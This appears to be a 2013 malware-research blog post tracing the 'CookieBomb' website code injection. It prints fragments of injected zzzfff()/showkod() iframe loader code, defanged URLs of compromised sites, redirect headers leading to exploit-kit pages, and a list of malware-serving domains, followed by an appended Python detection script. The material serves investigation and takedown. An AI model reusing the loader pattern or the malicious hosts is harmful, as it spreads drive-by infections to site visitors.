I saw a widespread code-injection infection reported here, and decided to help the investigation:
As you may see in my tweets, I was struggling with the recently reported infection, and I came to a conclusion about what to grep for in order to follow and mitigate this attack further:
RT @unixfreaxjp: @Secluded_Memory you know I would if I could, I can't now, grab it from my prev. tweets, --- Helping too
— MalMouse (@malm0u53) July 22, 2013
@Secluded_Memory @unixfreaxjp CookieBomb javascript. Which seems to be the function zzzfff()
— MalMouse (@malm0u53) July 22, 2013
Which ended up as the list of functions and their IFRAME redirections below:
@Secluded_Memory @unixfreaxjp one variant out of last three days - showkod(){ versus zzzfff() hxxp://airbrush-design.cz/images/nGMcmjkK.php
— MalMouse (@malm0u53) July 22, 2013
Wow, many links to follow. So I made a breakdown check of each PHP infector, as released in the pastebin: http://pastebin.com/raw.php?i=0cGUGk8X
The significant results I summarized below:
One of the links:
function zzzfff() { ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php';
redirect >> hxxp://kastenbafortschrittliche.jaimestexmex.com:801/untrue-doing-edge_ago.htm
Which goes straight to the exploit landing page I mentioned here.
The other link goes straight to the fake 502:
function zzzfff() { rf.src = 'hxxp://appssold.com/wp-content/plugins/wp_add/D7AoggfC.php';
>> 500 Internal Server Error // header:
HTTP/1.1 500 Internal Server Error
Date: Mon, 22 Jul 2013 18:05:49 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 704
Connection: close
Content-Type: text/html; charset=iso-8859-1
The verdict for the malicious URL above is here.
One of the links redirects to localhost, which is strange for a legitimate link, isn't it?
function zzzfff() { gifdu.src = 'hxxp://olafknischewski.de/usage/esd.php';
HTTP/1.1 302 Found
Date: Mon, 22 Jul 2013 18:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm3
Location: http://localhost/
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
One link leads to a permanent redirection to an Exploit Kit landing page; that IP is a Plesk panel user:
function zzzfff() { gzz.src = 'hxxp://intrologic.nl/Mn84DfXb.php';
HTTP/1.1 301 Moved Permanently
Date: Mon, 22 Jul 2013 18:16:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.intrologic.nl/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Location: hxxp://www.intrologic.nl/Mn84DfXb.php
X-Powered-By: PleskLin
Verdict: [1] and [2]
One link:
function zzzfff() { c.src = 'hxxp://goldsilver.server101.com/ORIGINALGSB/traf.php';
> Redirects users to: hxxp://www.schwarzeraben.de/rel.php
Loads malware from:
fgnfdfthrv.bee.pl
alolipololi.osa.pl
gberbhjerfds.osa.pl
zxsoftpromo.ru
centralfederation.ru
chimeboom.ru
faqaboutme.ru
lkjoiban.ru
longqwality.ru
zxsoftpromo.ru
This attack uses the .htaccess file to redirect users to sites serving malware. Verdict: [1] http://labs.sucuri.net/db/malware/malware-entry-mwhta7 [3]
The MMD domain-check tool shows the following result:
fgnfdfthrv.bee.pl,127.0.0.1,
alolipololi.osa.pl,74.125.236.80,
gberbhjerfds.osa.pl,127.0.0.1,
zxsoftpromo.ru,,
centralfederation.ru,,
chimeboom.ru,,
faqaboutme.ru,,
lkjoiban.ru,,
longqwality.ru,,
zxsoftpromo.ru,,
which means (WARNING!) the alolipololi.osa.pl domain is currently active for infection, fgnfdfthrv.bee.pl and gberbhjerfds.osa.pl are currently blacklisted, and the other .RU domains are inactive.
The links below went straight to blacklisted sites:
function zzzfff() { csp.src = 'hxxp://thyrr062.xsrv.jp/clicker.php';
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 18:57:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Connection: close
Content-Type: text/html
Verdict: [1] [2]
And..
function zzzfff() { nex.src = 'hxxp://informationking.com/dnlds/kQBx948q.php';
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 19:03:40 GMT
Server: Apache/1.3.41 (Unix) FrontPage/5.0.2.2635 PHP/5.2.17 mod_ssl/2.8.31 OpenSSL/0.9.8j
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Verdict: [1] [2]
With many other similar results in the pastebin I reported here.
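As an added example of the breakdown check described above (this is not the post's own code nor the MMD tools), the script below greps injected zzzfff()/showkod() loader stubs for their URLs, buckets a raw HTTP response header block into the verdict classes used in this post (fake 5xx, redirect to localhost, other redirect, live 200), and reads the domain,ip, output of the domain check. The sample inputs are constructed from snippets quoted in the post; treating a 127.0.0.1 resolution as "blacklisted" follows the post's own reading, and the verdict labels are my assumption.

```python
import re

# Constructed sample of the injected CookieBomb loader stubs quoted in the post (URLs defanged as hxxp).
INJECTED = ("function zzzfff() { ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php'; "
            "function zzzfff() { ywbc.src ='hxxp://htm.co.za/js/clicker.php'; "
            "function showkod(){ js_kod.src = 'hxxp://airbrush-design.cz/images/nGMcmjkK.php';")

# Response header blocks (status line first) reduced from the ones shown in the post.
RESP_LOCALHOST = "HTTP/1.1 302 Found\nServer: Apache\nLocation: http://localhost/\nContent-Length: 0"
RESP_FAKE_500 = "HTTP/1.1 500 Internal Server Error\nServer: Apache/2.2.21 (Unix)\nContent-Length: 704"
RESP_301 = "HTTP/1.1 301 Moved Permanently\nLocation: hxxp://www.intrologic.nl/Mn84DfXb.php\nX-Powered-By: PleskLin"

# Domain-check output in the domain,ip, form shown in the post (constructed subset).
DOMAIN_CHECK = "fgnfdfthrv.bee.pl,127.0.0.1,\nalolipololi.osa.pl,74.125.236.80,\nzxsoftpromo.ru,,"

# The grep: an injected function named zzzfff or showkod that sets <element>.src to a quoted URL.
LOADER_RE = re.compile(r"function\s+(zzzfff|showkod)\s*\(\)\s*\{\s*\w+\.src\s*=\s*'([^']+)'")


def extract_loaders(html):
    """Return (function name, loader URL) for every injected stub found in the page source."""
    return LOADER_RE.findall(html)


def classify_response(raw):
    """Bucket a raw response header block the way the post's verdicts do (labels are assumed)."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])
    location = next((l.split(":", 1)[1].strip() for l in lines[1:]
                     if l.lower().startswith("location:")), "")
    if status >= 500:
        return "fake-5xx"                      # infector answers with a (fake) server error
    if status in (301, 302):
        # a redirect to localhost is the odd case the post calls out; otherwise record the target
        return "redirect-localhost" if "localhost" in location else "redirect:" + location
    return "serves-200"                        # live content: check the host against blacklists


def classify_domains(csv_text):
    """Read domain,ip, lines: empty ip = inactive, loopback = blacklisted (per the post), else active."""
    verdicts = {}
    for line in csv_text.strip().splitlines():
        domain, ip = line.split(",")[:2]
        verdicts[domain] = "inactive" if not ip else ("blacklisted" if ip == "127.0.0.1" else "active")
    return verdicts
```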
This investigation is posted to help give a verdict on the malicious activities caused by the #CookieBomb code injection attack, and to support the shutdown of its detected malicious domains. The post is a group effort; thank you to @DarrelRendell and @Secluded_Memory for supporting this case with great advice.
#MalwareMustDie!